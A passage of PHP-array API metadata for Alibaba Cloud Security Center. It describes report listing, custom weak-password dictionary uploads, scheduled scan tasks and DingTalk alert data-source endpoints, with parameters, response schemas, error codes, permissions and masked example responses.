'ReportVersion', 'in' => 'query', 'schema' => ['description' => 'The report version. Valid values:'."\n" ."\n" .'* **1.0.0**'."\n" .'* **2.0.0**'."\n", 'type' => 'string', 'required' => false, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'Pinned', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to pin the report. Valid values:'."\n" ."\n" .'* **false**'."\n" .'* **true**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '9FBC6E47-7508-58C9-9E76-528E118CB1CC', 'title' => ''], 'ReportList' => [ 'description' => 'The reports.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the report.'."\n", 'type' => 'object', 'properties' => [ 'ReportStatus' => ['description' => 'The state of the report. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: enabled'."\n", 'type' => 'string', 'example' => '0', 'title' => ''], 'IsDefault' => ['description' => 'Indicates whether the report is the default report. Valid values:'."\n" ."\n" .'* **0**: no'."\n" .'* **1**: yes'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'ReportType' => ['description' => 'The type of the report. Valid values:'."\n" ."\n" .'* **0**: daily report'."\n" .'* **1**: weekly report'."\n" .'* **2**: monthly report'."\n" .'* **3**: report whose statistics are collected in a custom time range'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ReportId' => ['description' => 'The ID of the report.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Title' => ['description' => 'The name of the report.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'ReportVersion' => ['description' => 'The report version.'."\n", 'type' => 'string', 'example' => '2.0.0', 'title' => ''], 'ReportStartDate' => ['description' => 'The start date on which the report is sent. The value is a UNIX timestamp. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1721836800000', 'title' => ''], 'ReportEndDate' => ['description' => 'The end date on which the report is sent. The value is a UNIX timestamp. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1721923199999', 'title' => ''], 'PinnedTime' => ['description' => 'The timestamp when the report is pinned. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1721836800000', 'title' => ''], 'ReportDays' => ['description' => 'The most recent days for report statistics.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeCustomizeReportList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizeReportList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCustomizeReportList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9FBC6E47-7508-58C9-9E76-528E118CB1CC\\",\\n \\"ReportList\\": [\\n {\\n \\"ReportStatus\\": \\"0\\",\\n \\"IsDefault\\": \\"1\\",\\n \\"ReportType\\": 0,\\n \\"ReportId\\": 1,\\n \\"Title\\": \\"test\\",\\n \\"ReportVersion\\": \\"2.0.0\\",\\n \\"ReportStartDate\\": 1721836800000,\\n \\"ReportEndDate\\": 1721923199999,\\n \\"PinnedTime\\": 1721836800000,\\n \\"ReportDays\\": 7\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCustomizedDict' => [ 'summary' => 'Queries the upload result of a custom weak password file.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '58.240.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generated for the request.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX', 'title' => ''], 'FileName' => ['description' => 'The name of the weak password file in OSS.', 'type' => 'string', 'example' => 'test_dict.plain'."\n", 'title' => ''], 'OssUrl' => ['description' => 'The OSS object URL.', 'type' => 'string', 'example' => 'cloudtest01/661767e1-5ae3-4ec5-865f-03039436893a/sacc2*****', 'title' => ''], 'UploadTime' => ['description' => 'The upload timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1719919421', 'title' => ''], 'Limit' => ['description' => 'The maximum number of weak password rules that can be added.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'Count' => ['description' => 'The number of weak password rules that have been added.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'FileSize' => ['description' => 'The file size. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '40'."\n", 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query custom weak passwords', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizedDict'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCustomizedDict', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX\\",\\n \\"FileName\\": \\"test_dict.plain\\\\n\\",\\n \\"OssUrl\\": \\"cloudtest01/661767e1-5ae3-4ec5-865f-03039436893a/sacc2*****\\",\\n \\"UploadTime\\": 1719919421,\\n \\"Limit\\": 9,\\n \\"Count\\": 1,\\n \\"FileSize\\": 40\\n}","type":"json"}]', ], 'DescribeCustomizedDictUploadInfo' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '106.11.43.***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The OSS file key.', 'type' => 'string', 'example' => 'HC_CUSTOMIZED_DICT/176618589410****.tmp', 'title' => ''], 'Signature' => ['description' => 'The OSS signature.', 'type' => 'string', 'example' => 'mWGRgn0CtdbVf8UuJbTXOmo2****', 'title' => ''], 'Host' => ['description' => 'The OSS domain name.', 'type' => 'string', 'example' => 'https://aegis-update-static-file.oss-cn-hangzhou.aliyuncs.com', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this identifier to troubleshoot issues.', 'type' => 'string', 'example' => 'BDEDEEE7-AC25-559E-8C12-5168B139****', 'title' => ''], 'Policy' => ['description' => 'The bucket policy of the OSS bucket.', 'type' => 'string', 'example' => 'eyJleHBpcmF0aW9uIjoiMjAyNC0wNy0wMlQxMTo1Nzo1MC44MzJaIiwiY29uZGl0aW9ucyI6W1siY29udGVudC1sZW5ndGgtcmFuZ2UiLDAsNDA5NjBdLFsiZXEiLCIka2V5IiwiSENfQ1VTVE9NSVpFRF9ESUNUXC8xNzY2MTg1ODk0MTA0Njc1LnRtc****', 'title' => ''], 'Accessid' => ['description' => 'The AccessKey ID required to access the file.', 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'Expire' => ['description' => 'The expiration time of the authentication, in timestamp format.', 'type' => 'string', 'example' => '1719921470', 'title' => ''], 'SecurityToken' => ['description' => 'The Security Token Service (STS) token.', 'type' => 'string', 'example' => '***', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'View OSS details of custom weak password upload', 'summary' => 'Queries the information about the OSS bucket that stores custom weak password files.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizedDictUploadInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCustomizedDictUploadInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Key\\": \\"HC_CUSTOMIZED_DICT/176618589410****.tmp\\",\\n \\"Signature\\": \\"mWGRgn0CtdbVf8UuJbTXOmo2****\\",\\n \\"Host\\": \\"https://aegis-update-static-file.oss-cn-hangzhou.aliyuncs.com\\",\\n \\"RequestId\\": \\"BDEDEEE7-AC25-559E-8C12-5168B139****\\",\\n \\"Policy\\": \\"eyJleHBpcmF0aW9uIjoiMjAyNC0wNy0wMlQxMTo1Nzo1MC44MzJaIiwiY29uZGl0aW9ucyI6W1siY29udGVudC1sZW5ndGgtcmFuZ2UiLDAsNDA5NjBdLFsiZXEiLCIka2V5IiwiSENfQ1VTVE9NSVpFRF9ESUNUXC8xNzY2MTg1ODk0MTA0Njc1LnRtc****\\",\\n \\"Accessid\\": \\"yourAccessKeyID\\",\\n \\"Expire\\": \\"1719921470\\",\\n \\"SecurityToken\\": \\"***\\"\\n}","type":"json"}]', ], 'DescribeCustomizedStrategyTargets' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92048', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '39.170.43.**', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], 'StartegyTargets' => [ 'description' => 'The list of target information for the custom policy.', 'type' => 'array', 'items' => [ 'description' => 'The target information for the custom policy.', 'type' => 'object', 'properties' => [ 'StrategyName' => ['description' => 'The name of the baseline check policy.', 'type' => 'string', 'example' => '白名单', 'title' => ''], 'StrategyId' => ['description' => 'The ID of the baseline check policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '1884', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group.'."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query server group IDs.', 'type' => 'integer', 'format' => 'int64', 'example' => '14590457', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'example' => '2701ad2e-0e8f-428c-8812-ebb2686e****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query custom policy targets', 'summary' => 'Queries the target machines included in a custom policy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizedStrategyTargets'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCustomizedStrategyTargets', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\",\\n \\"StartegyTargets\\": [\\n {\\n \\"StrategyName\\": \\"白名单\\",\\n \\"StrategyId\\": 1884,\\n \\"GroupId\\": 14590457,\\n \\"Uuid\\": \\"2701ad2e-0e8f-428c-8812-ebb2686e****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCycleTaskList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92052', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TaskName', 'in' => 'query', 'schema' => ['description' => 'The node name. Valid values:'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.'."\n" .'- **IMAGE_SCAN**: image scan.'."\n" .'- **EMG\\_VUL\\_SCHEDULE\\_SCAN**: emergency vulnerability scanning.', 'type' => 'string', 'required' => false, 'example' => 'IMAGE_SCAN', 'title' => ''], ], [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The node type. Valid values:'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.'."\n" .'- **IMAGE_SCAN**: image scan.'."\n" .'- **EMG\\_VUL\\_SCHEDULE\\_SCAN**: emergency vulnerability scanning.', 'type' => 'string', 'required' => false, 'example' => 'IMAGE_SCAN', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when using paging. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the configuration.'."\n" .'>Call the [CreateCycleTask](~~CreateCycleTask~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'f93b6ee24cfd0aad44b897ad5051****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CycleScheduleResponseList' => [ 'description' => 'The list of cyclic scan tasks.', 'type' => 'array', 'items' => [ 'description' => 'The list of cyclic scan tasks.', 'type' => 'object', 'properties' => [ 'LastTaskId' => ['description' => 'The ID of the last task.', 'type' => 'string', 'example' => '38730bb078f4a1461d4ed283994c****', 'title' => ''], 'ConfigId' => ['description' => 'The ID of the configuration.', 'type' => 'string', 'example' => '2cdbdeba8dd70586d5814d4cbf21****', 'title' => ''], 'TargetEndTime' => ['description' => 'The task end time, in hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'NextStartTimeStr' => ['description' => 'The next execution time. The value is a millisecond-level timestamp.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671184531000', 'title' => ''], 'TaskName' => ['description' => 'The task name.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'TaskType' => ['description' => 'The task type.', 'type' => 'string', 'example' => 'IMAGE_SCAN', 'title' => ''], 'IntervalPeriod' => ['description' => 'The interval period.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'FirstDateStr' => ['description' => 'The first execution time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1667491200000', 'title' => ''], 'Param' => ['description' => 'The extended information field.', 'type' => 'string', 'example' => '{"userAgreement":"yes","lang":"zh"}', 'title' => ''], 'PeriodUnit' => ['description' => 'The unit of the scan period. Valid values:'."\n" .'- **day**: day.'."\n" .'- **hour**: hour.', 'type' => 'string', 'example' => 'day', 'title' => ''], 'TargetStartTime' => ['description' => 'The task start time, in hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Enable' => ['description' => 'Indicates whether the task is enabled. Valid values:'."\n" .'- **1**: enabled.'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Query general-purpose scheduled task list', 'summary' => 'Queries the list of general-purpose scheduled nodes, including image scan, emergency vulnerability scanning, and virus scan nodes.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCycleTaskList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCycleTaskList', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CycleTask', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:cycletask/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 9\\n },\\n \\"CycleScheduleResponseList\\": [\\n {\\n \\"LastTaskId\\": \\"38730bb078f4a1461d4ed283994c****\\",\\n \\"ConfigId\\": \\"2cdbdeba8dd70586d5814d4cbf21****\\",\\n \\"TargetEndTime\\": 7,\\n \\"NextStartTimeStr\\": 1671184531000,\\n \\"TaskName\\": \\"IMAGE_SCAN\\",\\n \\"TaskType\\": \\"IMAGE_SCAN\\",\\n \\"IntervalPeriod\\": 3,\\n \\"FirstDateStr\\": 1667491200000,\\n \\"Param\\": \\"{\\\\\\"userAgreement\\\\\\":\\\\\\"yes\\\\\\",\\\\\\"lang\\\\\\":\\\\\\"zh\\\\\\"}\\",\\n \\"PeriodUnit\\": \\"day\\",\\n \\"TargetStartTime\\": 0,\\n \\"Enable\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDataSource' => [ 'summary' => 'Queries the data sources for DingTalk alert configurations. You can configure the scope of DingTalk alert notifications based on the data sources.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92053', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '39.155.*.*', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ConfigType', 'in' => 'query', 'schema' => ['description' => 'The type of data source to retrieve. This parameter is currently fixed to DingTalk.', 'type' => 'string', 'required' => false, 'example' => 'DingTalk', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDXXXX', 'title' => ''], 'MetaDatas' => [ 'description' => 'The metadata of the data sources.', 'type' => 'array', 'items' => [ 'description' => 'The metadata of the data sources.', 'type' => 'object', 'properties' => [ 'Description' => ['description' => 'The description of the data source.', 'type' => 'string', 'example' => 'dingtalk_suspicious', 'title' => ''], 'DataSourceName' => ['description' => 'The name of the data source.', 'type' => 'string', 'example' => 'sas_analysis_pre-sas-operation-log-sas-event-suspicious', 'title' => ''], 'DataSourceId' => ['description' => 'The ID of the data source.', 'type' => 'integer', 'format' => 'int32', 'example' => '1753', 'title' => ''], 'MetaDataFields' => [ 'description' => 'The metadata fields.', 'type' => 'array', 'items' => [ 'description' => 'The metadata fields.', 'type' => 'object', 'properties' => [ 'ValueType' => ['description' => 'The value type of the field.', 'type' => 'string', 'example' => 'string', 'title' => ''], 'Filed' => ['description' => 'The key of the field.', 'type' => 'string', 'example' => 'type', 'title' => ''], 'FiledName' => ['description' => 'The name of the field.', 'type' => 'string', 'example' => 'dingtalk_vul_type', 'title' => ''], 'Sample' => ['description' => 'The sample value of the field.', 'type' => 'string', 'example' => 'all:dingtalk_all;cms:dingtalk_vul_cms;oval:dingtalk_vul_cve;sys:dingtalk_vul_sys;emg:dingtalk_vul_emg', 'title' => ''], 'OperatorList' => [ 'description' => 'The operator types.', 'type' => 'array', 'items' => [ 'description' => 'The operator types.', 'type' => 'object', 'properties' => [ 'Description' => ['description' => 'The description of the operator.', 'type' => 'string', 'example' => 'dingtalk_vul', 'title' => ''], 'Name' => ['description' => 'The name of the operator.', 'type' => 'string', 'example' => 'regex', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query data sources for dingTalk alert configurations', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDataSource'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDataSource', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDXXXX\\",\\n \\"MetaDatas\\": [\\n {\\n \\"Description\\": \\"dingtalk_suspicious\\",\\n \\"DataSourceName\\": \\"sas_analysis_pre-sas-operation-log-sas-event-suspicious\\",\\n \\"DataSourceId\\": 1753,\\n \\"MetaDataFields\\": [\\n {\\n \\"ValueType\\": \\"string\\",\\n \\"Filed\\": \\"type\\",\\n \\"FiledName\\": \\"dingtalk_vul_type\\",\\n \\"Sample\\": \\"all:dingtalk_all;cms:dingtalk_vul_cms;oval:dingtalk_vul_cve;sys:dingtalk_vul_sys;emg:dingtalk_vul_emg\\",\\n \\"OperatorList\\": [\\n {\\n \\"Description\\": \\"dingtalk_vul\\",\\n \\"Name\\": \\"regex\\"\\n }\\n ]\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeDefaultKeyInfo' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '58.246.73.***', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Names' => ['description' => 'The company names.', 'type' => 'string', 'example' => '****技术股份有限公司', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578A****', 'title' => ''], 'DomainList' => [ 'description' => 'The list of domain names.', 'type' => 'array', 'items' => ['description' => 'The domain name information.', 'type' => 'string', 'example' => '["*.test123.com","test234.cn"]', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query default key information', 'summary' => 'Retrieves the keywords used to generate a custom dictionary in custom weak password detection.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDefaultKeyInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeDefaultKeyInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Names\\": \\"****技术股份有限公司\\",\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578A****\\",\\n \\"DomainList\\": [\\n \\"[\\\\\\"*.test123.com\\\\\\",\\\\\\"test234.cn\\\\\\"]\\"\\n ]\\n}","type":"json"}]', ], 'DescribeDefaultProxyInstallVersion' => [ 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'InstallVersion' => ['description' => 'The default installation version.', 'type' => 'string', 'example' => 